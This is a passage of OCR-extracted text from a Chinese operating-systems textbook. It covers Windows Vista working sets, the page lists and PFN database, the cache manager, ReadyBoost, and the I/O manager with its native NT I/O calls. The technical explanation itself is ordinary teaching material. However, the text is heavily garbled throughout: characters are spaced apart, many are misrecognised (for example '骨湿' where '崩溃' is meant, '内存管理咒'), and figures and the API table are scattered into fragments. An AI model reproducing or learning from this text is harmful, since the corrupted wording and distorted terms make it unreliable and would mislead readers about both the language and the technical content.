还 小 的 页 面 数量 〈 在 特定 的 环境 下 ) ， 或 者 比 它 的 工作 集 最 大 值 还 大 得 
多 的 页 面 数量 。 每 个 进程 初始 具有 同样 的 最 大 值 和 最 小 值 的 工作 集 ， 但 
这 些 边 界 随 着 时 间 的 推移 是 可 以 改变 的 ， 或 是 由 包含 在 作业 中 的 进程 的 
作业 对 象 决定 。 根 据 系统 中 的 全 部 物理 内 存 大 小 ， 这 个 默认 的 初始 最 小 
值 的 范围 是 20 一 50 个 页 面 ， 而 最 大 值 的 范围 是 45 一 345 个 页 面 。 系 统管 
理 员 可 以 改变 这 些 默认 值 。 尽 管 一 般 的 家 帮 用 户 很 少 去 设置 ， 但 是 服务 


融 端 程序 可 能 需要 设置 。 











只 有 妆 系 统 中 的 可 用 物理 内 存 降 得 很 低 的 时 候 工 作 集 才 会 起 作用 。 
其 他 情况 下 允许 进程 任意 使 用 它们 选择 的 通常 远 远 超出 工作 集 最 大 值 的 
内 存 。 但 是 当 系 统 面临 内 存 压 力 的 时 候 ， 内 存 管 理 器 开始 将 超出 工作 集 
上 限 最 大 的 进程 使 用 的 内 存 压 回 到 它们 的 工作 集 范 围 内 。 工 作 集 管理 露 
共有 三 级 基于 定时 需 的 周期 活动 。 新 的 活动 会 加 入 到 相应 的 级 别 。 














TD) 大 量 的 可 用 内 存 ; 扫描 页 面 ， 复 位 页 面 的 访问 位 ， 并 使 用 访问 位 
的 值 来 表示 每 个 页 面 的 新 旧 程度 。 在 每 个 工作 集 内 保留 使 用 一 个 估算 数 
量 的 未 使 用 页 面 。 








2) 内 存 开始 紧缺 : 对 每 个 具有 一 定 比例 未 用 页 面 的 进程 ， 停 止 为 工 
作 集 增加 页 面 ， 同 时 在 需要 增加 一 个 新 的 页 面 的 时 候 换 出 最 旧 的 页 面 。 
换 出 的 页 面 进入 后 备 或 者 已 修改 链表 。 





3) 内 存 紧 缺 : 消减 〈 也 即 减 小 ) 工作 集 ， 通 过 移 除 最 旧 的 页 面 从 而 
降低 工作 集 的 最 大 值 。 


平衡 集 管理 器 (balance set manager) 线程 调用 工作 集 管理 器 ， 使 得 
其 每 秒 都 在 运行 。 工 作 集 管理 器 抑制 一 定数 量 的 工作 从 而 不 会 使 得 系统 
过 载 。 它 同时 也 监控 要 写 回 磁盘 的 已 修改 链表 上 的 页 面 ， 通 过 唤醒 
ModifiedPageWriter 线 程 使 得 页 面 数 量 不 会 增长 得 过 快 。 











3. 物 理 内 存 管理 


上 面 提 到 了 物理 页 面 的 三 种 不 同 链表 ， 空 闲 链表 、 后 备 链表 和 已 修 
改 链表 。 除 此 以 外 还 有 第 四 种 链表 ， 即 全 部 被 填 零 的 空 亲 页 面 。 系 统 会 
频繁 地 请 求全 零 的 页 面 。 当 为 进程 提供 新 的 页 面 ， 或 者 读 取 一 个 文件 的 
最 后 部 分 不 足 一 个 页 面 时 ， 需 要 全 零 页 面 。 将 一 个 页 面 写 为 全 零 是 需要 
时 间 的 ， 因 此 在 后 台 使 用 低 优 先 级 的 线程 创建 全 零 页 是 一 个 较 好 的 方 
式 。 愉 外 还 有 第 五 种 链表 存放 有 硬件 错误 的 页 面 〈 即 通过 硬件 错误 检 
UD) 。 





系统 中 的 所 有 页 面 要 么 由 一 个 有 效 的 页 表 项 索引 ， 要 么 属于 以 上 五 
种 链表 中 的 一 种 ， 它 们 的 全 体 称 为 页 框 号 数据 库 (PFN 数 据 库 ) 。 图 11- 
35 表 明 PFN 数 据 库 的 结构 。 该 表格 由 物理 页 框 亏 索引 。 表 项 都 是 固定 长 
度 的 ， 但 是 不 同类 型 的 表 项 使 用 不 同 的 格式 〈 例 如 共 衬 页 面相 对 于 私有 
页 面 )。 有 效 的 表 项 维护 页 面 的 状态 以 及 指 癌 该 页 面 数 量 的 计数 。 工 作 








集中 的 页 面 指 出 哪个 表 项 索引 它们 。 还 有 一 个 指向 该 页 的 进程 页 表 的 指 
针 〈 非 共 译 页 )， 或 者 指向 原型 页 表 的 指针 〈 共 译 页 〉。 


页 帧 数据 库 


State Cnt WS Other PT Next 页 表 
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图 11-35 一 个 有 效 的 页 面 在 页 框 数据 库 上 的 一 些 主要 域 


此 外 还 有 一 个 指向 链表 中 下 一 个 页 面 的 指针 《如 果 有 的 话 ) ， 以 及 
其 他 的 若干 诸如 正在 进行 读 和 写 的 域 以 及 标志 位 等 。 这 些 链表 链接 在 一 
起 ， 并 且 通 过 下 标 指 向 下 一 个 单元 ， 不 使 用 指针 ， 从 而 达到 节省 存储 空 
间 的 目的 。 另 外 用 物理 页 面 的 表 项 汇总 在 若干 指向 物理 页 面 的 页 表 项 中 
找到 的 脏 位 《〈《 即 由 于 共享 页 面 ) 。 表 项 还 有 一 些 别 的 信息 用 来 表示 内 存 
页 面 的 不 同 ， 以 便 访问 那些 内 存 速度 更 快 的 大 型 服务 器 系统 上 〔 即 
NUMA- 非 均衡 存储 器 访问 的 机 器 ) 。 





工作 集 管 理 器 和 其 他 的 系统 线程 控制 页 面 在 工作 集 和 不 同 的 链表 间 
移动 。 下 面 对 这 些 转变 进行 研究 。 当 工作 集 管 理 器 将 一 个 页 面 从 某 个 工 
作 集中 去 反 ， 则 该 页 面 按照 目 身 是 否 修改 的 状态 进入 后 备 或 已 修改 链表 
的 底部 。 这 一 转变 在 图 11-36 的 〈1) 中 进行 了 说 明 。 


需要 全 零 页 面 (8) 















被 修改 
页 面 链 










(4) 已 修 面 链表 
改 页 面 写 


入 器 


(3) 进程 退出 





(1) 从 所 有 的 工作 集 收 回 的 页 面 


图 11-36 不 同 的 页 面 链表 以 及 它们 之 间 的 转变 


这 两 个 链表 中 的 页 面 仍然 是 有 效 的 页 面 ， 当 页 面 失效 发 生 的 时 候 需 
要 所 们 中 的 一 个 页 ， 则 将 该 页 移 回 工作 集 而 不 需要 进行 磁盘 IO 操作 
(2) 。 当 一 个 进程 退出 ， 该 进程 的 非 共 享 页 面 不 能 通过 异常 机 制 回 到 
以 前 的 工作 集 ， 因 此 该 进程 页 表 中 的 有 效 页 面 以 及 挂 起 和 已 修改 链表 中 
的 页 面 都 移入 空闲 链表 G) 。 任 何 该 进程 的 页 面 文件 也 得 到 释放 。 








其 他 的 系统 调用 会 引起 别 的 转变 。 平 衡 集 管理 器 线程 每 4 秒 运行 一 
次 来 查找 那些 所 有 的 线程 都 进入 空闲 状态 超过 一 定 秒 数 的 进程 。 如 果 发 





现 这 样 的 进程 ， 束 从 物理 内 存 去 挥 它们 的 内 核 栈 ， 这 样 的 进程 的 页 面 也 
如 (1) 一 样 移动 到 后 备 链表 或 已 修改 链表 。 





两 个 系统 线程 一 一 映射 页 面 写 入 器 (mapped page writer) 和 已 修改 
页 面 写 入 器 (modified page writer) ， 周 期 性 地 被 唤醒 来 检查 是 否 系 统 
中 有 是 够 的 干净 页 面 。 如 果 没 有 ， 这 两 个 线程 从 已 修改 链表 的 顶部 取出 
页 面 ， 写 回 到 磁盘 ， 然 后 将 这 些 页 面 插入 后 备 链表 (4) 。 前 者 处 理 对 
于 映射 文件 的 号 ， 而 后 者 处 理 页 面 文件 的 号 。 这些 写 的 结果 就 是 将 已 修 
改 〈 脏 ) 页 面 移 到 后 备 〈 于 净 ) 链表 中 。 





之 所 以 使 用 两 个 线程 是 因为 映射 文件 可 能 会 因为 写 的 结果 增长 ， 而 
增长 的 结果 就 需要 对 磁盘 上 的 数据 结构 具有 相应 的 权限 来 分 配 空闲 磁盘 
块 。 当 一 个 页 面 被 写 入 时 如 果 没 有 足够 的 内 存 ， 就 会 导致 死 锁 。 男 一 个 
线程 则 是 解决 癌 页 面 文件 写 入 页 时 的 问题 。 








下 面 说 明 图 11-36 中 必 一 个 转换 。 如 采 进 程 解除 页 映射 ， 该 页 不 再 
和 进程 相关 从 而 进入 空闲 链表 〈5) ， 当 该 页 是 共享 的 时 候 例 外 。 当 页 
面 失效 会 请 求 一 个 页 框 给 将 要 读 入 的 页 ， 此 时 该 页 框 会 尽 可 能 从 空闲 链 
表 中 取 下 《6) 。 由 于 该 页 会 被 全 部 重 写 ， 因 此 即使 有 机 密 的 信息 也 没 
有 关系 。 








栈 的 增长 则 是 另 一 种 情况 。 这 种 情况 下 ， 需 要 一 个 空 的 页 框 ， 同 时 
安全 规则 要 求 该 页 全 零 。 由 于 这 个 原因 ， 另 一 个 称 为 零 页 面 线程 


(ZeroPage thread) 的 低 优先 级 内 核 线 程 (参见 图 11-28) 将 空闲 链表 中 
的 页 面 写 全 零 并 将 页 面 放 入 全 零 页 链表 (7) 。 全 零 页 面 很 可 能 比 空闲 
页 面 更 加 有 用 ， 因 此 只 要 当 CPU 空 闲 且 有 空闲 页 面 ， 零 页 面 线程 就 会 将 
这 些 页 面 全 部 写 零 ， 而 在 CPU 空闲 的 时 候 进 行 这 一 操作 也 是 不 增加 开销 
的 。 








所 有 这 些 链 表 的 存在 导致 了 一 些微 妙 的 策略 抉择 。 例 如 ， 假 设 要 从 
磁盘 载 入 一 个 页 面 ， 但 是 空闲 链表 是 空 的 ， 那 么 ， 要 么 从 后 备 链 表 中 取 
出 一 个 干净 页 (虽然 这 样 做 稍 后 有 可 能 导致 缺 页 ) ， 要 么 从 全 零 页 面 链 
表 中 取出 一 个 空 页 (忽略 把 该 页 清 零 的 代价 ) ， 系 统 必须 在 上 述 两 种 集 
略 之 间 做 出 选择 。 哪 一 个 更 好 呢 ? 











内 存 管 理 咒 必须 决定 系统 线程 把 页 面 从 已 修改 链表 移动 到 后 备 链表 
的 积极 程度 。 有 王 净 的 页 面 后 备 总 比 有 脏 页 后 备 好 得 多 《因为 如 有 需 
要 ,干净 的 页 可 以 立即 重用 ) ， 但 是 一 个 积极 的 净化 朱 略 意味 着 更 多 的 
磁盘 IO， 同 时 一 个 刚刚 净化 的 页 面 可 能 由 于 缺 页 中 断 重 新 回 到 工作 集 
中 ， 然 后 又 成 为 脏 页 。 通 常 来 讲 ，Windows 通 过 算法 、 启 发 、 猜 测 、 历 
史 、 经 验 以 及 管理 员 可 控 参 数 的 配置 来 做 权衡 。 





忆 而 言 之 ， 内 存 管理 需要 一 个 拥有 多 种 数据 结构 、 算 法 和 局 友 性 的 
十 分 复杂 、 重 要 的 构件 。 它 尽 可 能 地 自我 调整 ， 但 是 仍然 留 有 很 多 选项 
使 系统 管理 员 可 以 通过 配置 这 些 选 项 来 影响 系统 性 能 。 大 部 分 的 选项 和 
计数 需 可 以 通过 工具 浏览 ， 相 关 的 各 种 工具 包 在 前 面 都 有 提 到 。 也 许 在 





这 里 最 值得 记 住 的 束 是 ， 在 真实 的 系统 里 ， 内 存 管理 不 仅仅 是 一 个 简单 
的 时 钟 或 老化 的 页 面 算 法 。 


11.6 Windows Vista 的 高 速 缓 存 


Windows™ RRIF (cache) 通过 把 最 近 和 经 常 使 用 的 文件 片段 保存 
在 内 存 中 的 方式 来 提升 文件 系统 的 性 能 。 高 速 缓存 管理 器 管理 的 是 虚拟 
寻 址 的 数据 块 ， 也 惑 是 文件 片段 ， 而 不 是 物理 寻 址 的 磁盘 块 。 这 种 方法 
非常 适合 NTFS 文 件 系 统 ， 如 11.8 节 所 示 。NTEFS 把 所 有 的 数据 作为 文件 
来 存储 ， 包 括 文件 系统 的 元 数据 。 高 速 缓存 的 文件 片段 称 为 视图 
(view) ， 这 是 因为 它们 代表 了 被 映射 到 文件 系统 的 文件 上 的 内 核 虚 拟 
地 址 片段 。 所 以 ， 在 高 速 缓存 中 ， 对 物理 内 存 的 管理 实际 上 是 由 内 存 管 
理 需 提供 的 。 高 速 缓存 管理 器 的 作用 是 为 视图 管理 内 核 虚 拟 地 址 的 使 
用 ， 命 令 内 存 管 理 圳 在 物理 内 存 中 钉 住 页 面 ， 以 及 为 文件 系统 提供 接 














Windows 高 速 绥 存 省 理 莫 工具 在 文件 系统 中 被 广泛 地 共享 。 这 是 因 
为 高 速 缓存 是 根据 独立 的 文件 来 虚拟 寻 址 的 ， 高 速 缓存 管理 器 可 以 在 文 
件 的 基础 上 很 轻易 地 实现 预 恋 取 。 访 问 高 速 缓存 数据 的 请 求 来 自 于 每 个 
文件 系统 。 由 于 文件 系统 不 需要 先 把 文件 的 偏 移 转换 成 物理 磁盘 号 然后 
再 请 求 读 取 高 速 缓存 的 文件 页 ， 所 以 虚拟 缓存 非常 方便 。 类 似 的 转换 发 
生 在 内 存 管理 器 调用 文件 系统 访问 存储 在 磁盘 上 的 页 面 的 时 候 。 























除了 对 内 核 虚 拟 地 址 和 用 来 缓存 的 物理 内 存 资 源 的 定理 外 ， 考 虑 到 
视图 的 一 臻 性， 大 批量 磁盘 回 写 ， 以 及 文件 结束 标志 的 正确 维护 特别 











是 当 文件 扩展 的 时 候 ) ， 高 速 缓存 管理 需 还 必须 与 文件 系统 协作 。 在 文 
件 系统 、 高 速 缓存 管理 器 和 内 存 管理 器 之 间 管 理 文件 最 困难 的 方面 在 于 
文件 中 最 后 一 个 字 市 的 偏 移 ， 即 有 效 数 据 长 度 。 如 果 一 个 程 友 写 出 了 文 
件 末 尾 ， 则 越过 的 磁盘 块 都 需要 清 零 ， 同 时 为 了 安全 的 原因 ， 在 文件 的 
元 数据 中 记录 的 有 效 数 据 长 度 不 应 该 允许 访问 未 经 初始 化 的 磁盘 块 ， 所 
以 全 零 厂 盘 块 在 文件 元 数据 更 新 为 新 的 长 度 之 前 必须 写 回 到 磁盘 上 。 然 
而 ， 可 以 预见 的 是 ， 如 果 系 统 骨 湿 ， 一 些 文件 的 数据 块 可 能 还 没有 按照 
内 存 中 的 数据 进行 更 新 ， 还 有 一 些 数据 块 可 能 含有 属于 其 他 文件 的 数 
据 ， 这 都 是 不 能 接受 的 。 




















现在 让 我 们 来 看 看 高 速 缓存 管理 器 是 如 何 工作 的 。 当 一 个 文件 被 引 
用 时 ， 高 速 缓存 管理 器 映射 一 块 大 小 为 256KB 的 内 核 虚拟 地 址 空间 给 文 
件 。 如 果 文件 大 于 256KB， 那 么 每 次 只 有 一 部 分 文件 被 映射 进来 。 如 果 
高 速 缓 存 管理 器 耗 尽 了 虚拟 地 址 空间 中 大 小 为 256KB 的 块 ， 那 么 ， 它 在 
映射 一 个 新 文件 之 前 必须 释放 一 个 旧 的 文件 。 文 件 一 旦 被 映射 ， 高 速 组 
存 管理 器 通过 把 内 核 虚 拟 地 址 空间 复制 到 用 户 缓 冲 区 的 方式 来 满足 对 该 
数据 块 的 请 求 。 如 果 要 复制 的 数据 块 不 在 物理 内 存 当 中 ， 会 发 生 缺 页 中 
断 ， 内 存 管理 器 会 按照 通常 的 方式 处 理 该 中 断 。 高 速 绥 存 管理 器 甚至 不 
知道 一 个 数据 块 是 不 是 在 内 存 当 中 。 复 制 总 是 成 功 的 。 



































除了 在 内 核 和 用 户 缓 冲 区 之 间 复 制 的 页 面 ， 高 速 缓存 管理 器 也 为 映 
财 到 虚拟 内 存 的 页 面 和 依靠 指针 访问 的 页 面 服务 。 当 一 个 线程 访问 茶 一 


上 映 射 到 文件 中 的 虚拟 地 址 但 发 生 缺 页 的 时 候 ， 内 存 管理 器 在 大 多 数 情 况 
下 能 够 使 用 软 中 断 处 理 这 种 访问 。 如 果 该 页 面 已 经 被 高 速 缓存 管理 器 映 
射 到 内 存 当 中 ， 即 该 页 面 已 经 在 物理 内 存 当 中 ， 那 么 就 不 需要 去 访问 磁 
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高 速 缓存 不 一 定 适 合 所 有 的 应 用 程序 。 大 型 企业 应 用 程序 ， 如 
SQL， 和 希望 自己 来 管理 高 速 缓存 和 IO。Windows 人 允许 文件 绕 开 高 速 缓存 
管理 器 ， 以 未 缓冲 IO 的 方式 打开 。 从 历史 上 看 ， 这 类 应 用 程序 使 用 一 
个 可 增长 的 用 户 态 虚拟 地 址 空间 来 蔡 代 操作 系统 提供 的 高 速 缓存 ， 因 
此 ， 系 统 应 支持 一 种 配置 ， 使 得 重新 启动 后 能 给 应 用 程序 提供 其 所 需 的 
3GB 的 用 户 态 地 址 空间 ， 而 只 使 用 1GB 的 地 址 空间 用 于 内 核 态 来 代替 2- 
GB/2-GB 的 传统 分 割 。 这 种 运行 模式 (启动 选项 局 用 后 ， 称 为 3GB 模 
式 ) 在 一 些 允 许 以 多 种 粒度 来 调整 用 户 /内 核 地 址 空间 分 割 的 操作 系统 
上 不 太 灵 活 。 当 Windows 运 行 在 3GB 模 式 下 时 ， 只 有 一 半数 量 的 内 核 虚 
拟 地 址 可 用 。 高 速 缓存 管理 器 通过 映射 更 少 的 文件 来 进行 调整 ， 这 正 是 
SQL 所 喜欢 的 。 























Windows Vista 在 系统 中 引入 了 一 种 全 新 的 、 有 别 于 高 速 缓存 管理 器 
的 缓存 技术 ， 称 为 ReadyBoost。 用 户 可 以 在 USB 接 口 或 其 他 端口 插入 内 
存 ， 并 命令 操作 系统 使 用 内 存 作为 一 个 通 写 缓存 。 闪 存 引 入 了 一 种 新 的 
存储 层次 ， 这 对 于 增加 磁盘 读 缓存 的 数量 特别 有 用 。 虽 然 比 不 上 作为 普 
通 内 存 的 动态 RAM (DRAM) ,但 是 从 闪存 读 取 数据 还 是 相当 快 的 。 








结合 高 速 的 DRAM 和 相对 廉价 的 内 存 ，Vista 系 统 以 少量 的 DRAM， 使 得 
不 必 开 启 机 箱 就 可 以 获得 更 高 的 性 能 。 





ReadyBoost 压 缩 数 据 〈 通 常 为 2 倍 ) ， 并 加 密 。ReadyBoost 使 用 一 
个 过 滤 驱 动 程序 来 处 理 文件 系统 发 送 到 卷 管理 器 的 MO 请 求 。 名 为 
ReadyBoot 的 类 似 技术 ， 通 过 使 用 闪存 缓存 数据 来 加 速 Windows Vista% 
统 的 局 动 时 间 。 但 是 这 些 技术 对 拥有 1GB 或 更 多 内 存 的 系统 影响 较 小 。 
在 只 有 512MB 内 存 的 系统 上 尝试 运行 Windows Vista 才 是 它们 真正 有 帮 
助 的 地 方 。 内 存 容量 将 近 1GB 的 系统 拥有 足够 的 内 存 ， 页 面 请 求 非常 罕 
见 ,使 得 磁盘 IO 能 够 满足 大 多 数 使 用 场景 。 








通 写 方式 对 闪存 家 拔除 时 减少 数据 丢失 很 重要 ， 但 未 来 的 PC 硬件 
可 能 在 主板 上 和 直接 集成 内 存 。 这 样 ， 闪 存 不 用 通 写 方式 也 可 以 使 用 ， 从 
而 缓存 系统 故障 时 也 需要 继续 存在 的 关键 数据 ， 而 无 需 旋 转 磁盘 。 这 不 
仅 带 来 了 性 能 的 提升 ， 而 且 还 可 以 降低 能 耗 “从 而 提高 笔记 本 电脑 的 电 
凶 和 寿命 ) ， 因 为 磁盘 旋转 少 了 。 现 在 一 些 笔记 本 电脑 一 直 在 致力 于 使 用 
大 量 的 内 存 来 代 答 机 电磁 盘 。 








11.7 Windows Vista 的 输入 /输出 


Windows IO 管理 器 提供 了 灵活 的 、 可 扩展 的 基础 框架 ， 以 便 有 效 
地 管理 非常 广泛 的 IO 设备 和 服务 ， 支 持 自 动 的 设备 识别 和 驱动 程序 安 
装 ( 即 插 即 用 〉 及 用 于 设备 和 CPU 的 电源 管理 一 一 以 上 均 基 于 异步 结构 
使 得 计算 可 以 与 JO 传 输 重 登 。 大 约 有 数 以 十 万 计 的 设备 在 Windows 
Vista 上 工作 。 一 大 批 常 用 设备 甚至 不 需要 安装 驱动 程序 ， 因 为 Windows 
操作 系统 已 附带 其 驱动 程序 。 但 即使 如 此 ， 考 虑 到 所 有 的 版 本 ， 也 有 将 
近 100 万 种 不 同 的 驱动 程序 在 Windows Vista 上 运行 。 以 下 各 节 中 ， 我 们 
将 探讨 一 些 W/O 相 关 的 问题 。 











11.7.1 基本 概念 


IO 管理 器 与 即 插 即 用 管理 器 紧密 联系 。 即 揪 即 用 背后 的 基本 思想 
是 一 条 可 枚 举 总 线 。 许 多 总 线 的 设计 ， 包 括 PC 卡 、PCI、PCI-x、AGP、 
USB, IEEE 1394、EIDE 和 SATA， 都 支持 即 插 即 用 管理 器 向 每 个 插 模 
发 送 请 求 ， 并 要 求 每 个 插 模 上 的 设备 表明 身份 。 即 插 即 用 管理 器 发 现 设 
备 的 存在 以 后 ， 就 为 其 分 配 硬件 资源 ， 如 中 断 等 级 ， 找 到 适当 的 驱动 程 
序 ， 并 加 载 到 内 存 中 。 每 个 驱动 程序 加 载 时 ， 就 为 其 创建 一 个 驱动 程序 
对 象 (driver object) 。 每 个 设备 至 少 分 配 一 个 设备 对 象 。 对 于 一 些 总 
线 ， 如 SCSI， 枚 举 只 发 生 在 局 动 时 间 ， 但 对 于 其 他 总 线 ， 如 USB， 枚 举 











可 以 在 任何 时 间 发 生 ， 这 就 需要 即 插 即 用 管理 器， 总 线 驱 动 程序 《确实 
在 枚 举 的 总 线 ) ， 和 IO 管理 器 之 间 的 密切 协作 。 


在 Windows 中 ， 所 有 与 硬件 无 关 的 程序 ， 如 文件 系统 、 反 病毒 过 滤 
器 、 卷 管理 器 、 网 络 协议 栈 ， 甚 至 内 核 服务 ， 都 是 用 IO 驱动 程序 来 实 
现 的 。 系 统 配置 必须 设置 成 能 够 加 载 这 些 驱动 程序 ， 因 为 在 总 线 上 不 存 
在 可 枚 举 相 关 的 设备 。 其 他 如 文件 系统 ， 在 需要 时 由 特殊 代码 加 载 ， 例 
如 文件 系统 识别 器 碍 看 旬 卷 ， 以 及 辨别 文件 系统 格式 的 时 候 。 








Windows 的 一 个 有 趣 的 特点 是 支持 动态 破 盘 〈dynamic disk) 。 这 些 
磁盘 可 以 跨越 多 个 分 区 ， 或 多 个 磁盘 ， 甚 至 无 需 重新 启动 在 使 用 中 就 可 
以 重新 配置 。 通 过 这 种 方式 ， 逻 辑 卷 不 再 被 限制 在 一 个 单一 的 分 区 或 磁 
盘 内 ， 一 个 单一 的 文件 系统 也 可 以 透明 地 跨越 多 个 驱动 器 。 





从 IO 到 卷 可 被 一 个 特殊 的 Windows 驱 动 程序 过 滤 产 生 卷 阴 影 副 本 
(Volume Shadow Copies) 。 过 滤 驱 动 程序 创建 一 个 可 单独 挂 载 的 ， 并 
代表 某 一 特定 时 间 点 的 卷 快照 。 为 此 ， 它 会 跟踪 快照 点 后 的 变化 。 这 对 
恢复 被 意外 删除 的 文件 或 根据 定期 生成 的 卷 快照 查看 文件 过 去 的 状态 非 
常 方便 。 





阴影 副本 对 精确 备份 服务 器 系统 也 很 有 价值 。 在 该 系统 上 运行 服务 
需 应 用 程序 ， 它 们 可 以 在 合适 的 时 机 制作 一 个 干净 的 持久 备份 。 一 旦 所 
有 的 应 用 程序 准备 束 绪 ， 系 统 初始 化 卷 快 照 ， 然 后 通知 应 用 程序 继续 执 


行 。 备 份 由 卷 快照 组 成 。 这 与 备份 期 间 不 得 不 脱 机 相 比 ， 应 用 程序 只 是 
被 阻 星 了 很 短 的 时 间 。 


应 用 程序 参与 快照 过程 ， 因 此 一 旦 发 生 故 障 ， 备 份 反映 的 是 一 个 非 
常 易于 恢复 的 状态 。 否 则 ， 束 算 备 份 仍然 有 用 ， 但 抓 取 的 状态 将 更 像 古 
系统 骨 湿 时 的 状态 。 而 从 骨 浊 点 恢复 系统 更 加 困难 ， 甚 至 是 不 可 能 的 ， 
因为 崩 泛 可 能 在 应 用 程序 执行 过 程 的 任意 时 刻 发 生 。 墨 菲 定 律 说 ， 故 障 
最 有 可 能 在 最 坏 的 时 候 发 生 ， 也 残 是 说 ， 故 障 可 能 在 应 用 程序 的 数据 正 
处 于 不 可 恢复 的 状态 时 发 生 。 





另 一 方面 ，Windows 支 持 异 步 JO。 一 个 线程 启动 一 个 IO 操作 ， 然 
后 与 该 MO 操作 并 行 执 行 。 这 项 功能 对 服务 器 来 说 特别 重要 。 有 各 种 不 
同 的 方法 使 线程 可 以 发 现 该 O 操 作 是 否 已 经 完成 。 一 是 启动 O 操 作 的 
同时 指定 一 个 事件 对 象 ， 然 后 等 待 它 结束 。 另 一 种 方法 是 指定 一 个 队 
列 ， 当 IO 操作 完成 时 ， 系 统 将 一 个 完成 事件 插入 到 队列 中 。 三 是 提供 
一 个 回调 函数 ，LIO 操 作 完 成 时 供 系 统 调 用 。 四 是 在 内 存 中 开辟 一 块 区 
域 ， 当 IO 操作 完成 时 由 IO 管理 器 更 新 该 区 域 。 


我 们 要 讨论 的 最 后 一 个 方面 ， 是 由 Windows Vista 提 出 的 VO 优先 
级 。IO 优 先 级 是 由 发 起 MO 操作 的 线程 来 确定 的 ， 或 者 也 可 以 明确 指 
定 。 共 有 5 个 优先 级 别 ， 分 别 是 : 关键 、 高 、 正 常 、 低 、 非 常 低 。 关 键 
级 别 为 内 存 管理 器 预 留 ， 以 避免 系统 经 历 极 端 内 存 压 力 时 出 现 死 锁 现 
象 。 低 和 非常 低 的 优先 级 为 后 台 进 程 所 使 用 ， 例 如 磁盘 健 片 整理 服务 、 


间谍 软件 扫描 医 和 桌面 搜索 ， 以 免 干扰 正常 操作 。 大 部 分 IO 操作 的 优 
先 级 是 正 千 级 别 ， 但 是 为 避免 小 故障 ， 多 媒体 应 用 程序 也 可 标记 和 它们 的 


得 带宽 保 











LO 优先 级 为 高 。 多 媒体 应 用 可 有 选择 地 使 用 带宽 预 留 模式 获 
证 以 访问 时 间 敏 感 的 文件 ， 如 音乐 或 视频 。IO 系 统 将 给 应 用 程序 提供 
最 优 的 传输 大 小 和 显 式 MO 操作 的 数目 ， 从 而 维持 应 用 程序 和 网 MO 系 统 请 
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11.7.2 输入 /输出 API 调 用 


由 IO 管理 器 提供 的 API 与 大 多 数 操作 系统 提供 的 API 并 没有 很 大 的 
不 同 。 基 本 操作 有 open、read、write、ioctl] 和 close， 以 及 即 插 即 用 和 电 
源 操作 、 参 数 设 置 、 刷 新 系统 缓冲 区 等 。 在 Win32 层 ， 这 些 API 被 包装 
成 接口 ， 癌 特定 的 设备 提供 了 更 高 一 级 的 操作 。 在 底层 ， 这 些 API 打 开 
设备 ， 并 执行 这 些 基本 类 型 的 操作 。 即 使 是 对 一 些 元 数据 的 操作 ， 如 重 
命名 文件 ， 也 没有 用 专门 的 系统 调用 来 实现 。 它 们 只 是 特殊 的 ioctl 操 
作 。 在 我 们 解释 了 IO 设备 栈 和 IO 管理 器 使 用 的 IO 请 求 包 (IRP) 之 
后 ， 读 者 将 对 上 面 的 陈述 更 有 体会 。 





保持 了 Windows 一 贯 的 通用 哲学 ， 原 生 NT 1/O 系 统 调用 带 有 很 多 参 
数 并 包括 很 多 变种 。 图 11-37 列 出 了 LO 管理 器 中 主要 的 系统 调用 接口 。 
NtCreateFile 用 于 打开 已 经 存在 的 或 者 新 的 文件 。 它 为 新 创建 的 文件 提供 
了 安全 描述 符 和 一 个 对 被 请 求 的 访问 权限 的 详细 描述 ， 并 使 得 新 文件 的 
创建 者 拥有 了 一 些 如 何 分 配 磁 盘 块 的 控制 权 。NtReadFile 和 NtWriteFile 
需要 文件 句柄 、 绥 冲 区 和 长 度 等 参数 。 它 们 也 需要 一 个 明确 的 文件 偏 移 
量 的 参数 ， 并 且 人 允许 指定 一 个 用 于 访问 文件 锁定 区 域 字 节 的 钥匙 。 正 如 
上 面 提 到 的 ， 大 部 分 的 参数 都 和 指定 哪 一 个 函数 来 报告 (很 可 能 是 异 
步 ) VO 操作 的 完成 有 关 。 








打开 一 个 新 的 或 已 存在 的 文件 或 设备 
从 一 个 文件 或 设备 上 读 取 数据 

把 数据 写 到 一 个 文件 或 设备 

请 求 关于 一 个 目录 的 信息 ， 包 括 文件 
当 任何 在 此 目录 中 或 其 子 目 录 树 中 的 文件 被 修改 时 执行 完成 
请 求 关于 一 个 文件 的 信息 

修改 文件 信息 

给 文件 中 一 个 区 域 加 领 

ERD TA 

对 一 个 文件 进行 多 种 操作 

把 内 存 文件 缓冲 刷新 到 磁盘 

取消 文件 上 未 完成 的 MO 操作 


NtDeviceIoControlFile 对 一 个 设备 的 特殊 操作 


IO 系统 调用 


NtQueryVolumeInformationFile 请 求 关 于 一 个 卷 的 信息 








图 11-37 执行 I/O 的 原生 NT API 调 用 





NtQuerydirectoryFile 是 一 个 在 执行 过 程 中 访问 或 修改 指定 类 型 对 象 
言 息 的 标准 模式 的 一 个 例子 ， 在 这 种 模式 中 存在 多 种 不 同 的 查询 API。 
在 本 例 中 ， 指 定 类 型 的 对 象 是 指 与 某 些 目录 相关 的 一 些 文件 对 象 。 一 个 
参数 用 于 指定 请 求 什么 类 型 的 信息 ， 比 如 目录 中 的 文件 名 列表 ， 或 者 是 
经 过 扩展 的 目录 列表 所 需要 的 每 个 文件 的 详细 信息 。 由 于 它 实 际 上 是 一 
个 WO 操作 ， 因 此 它 支 持 所 有 的 报告 VO 操作 已 完成 的 标准 方法 。 
NtQueryVolumeInformationFile 很 像 是 目录 查询 操作 ， 但 是 与 目录 查询 操 
作 不 同 的 是 ， 它 有 一 个 参数 是 打开 的 卷 的 文件 句柄 ， 不 管 这 个 卷 上 是 否 
有 文件 系统 。 与 目录 不 同 的 是 ， 卷 上 有 一 些 参数 可 以 修改 ， 因 此 这 里 有 
了 单独 用 于 卷 的 API NtSetVolumeInformationFile。 









































NtNotifyChangeDirectoryFile 是 一 个 有 趣 的 NT 范式 的 例子 。 线 程 可 
以 通过 IO 操作 来 确定 对 象 是 否 发 生 了 改变 〈 对 象 主要 是 文件 系统 的 目 
录 ， 就 像 在 此 例 中 ;也 可 能 是 注册 表 键 》。 因 为 IO 操作 是 异步 的 ， 所 
以 线程 在 调用 IO 操作 后 会 立即 返回 并 继续 执行 ， 并 且 只 有 在 修改 对 象 
之 后 线程 才 会 得 到 通知 。 未 处 理 的 请 求 作为 一 个 外 部 的 IO 操作 ， 使 用 
一 个 IO 请 求 包 CIRP) 被 加 入 到 文件 系统 的 队列 中 等 待 。 如 果 想 从 系统 
移 除 一 个 文件 系统 卷 ， 给 执行 过 未 处 理 WVO 操 作 的 线程 的 通知 就 会 出 问 
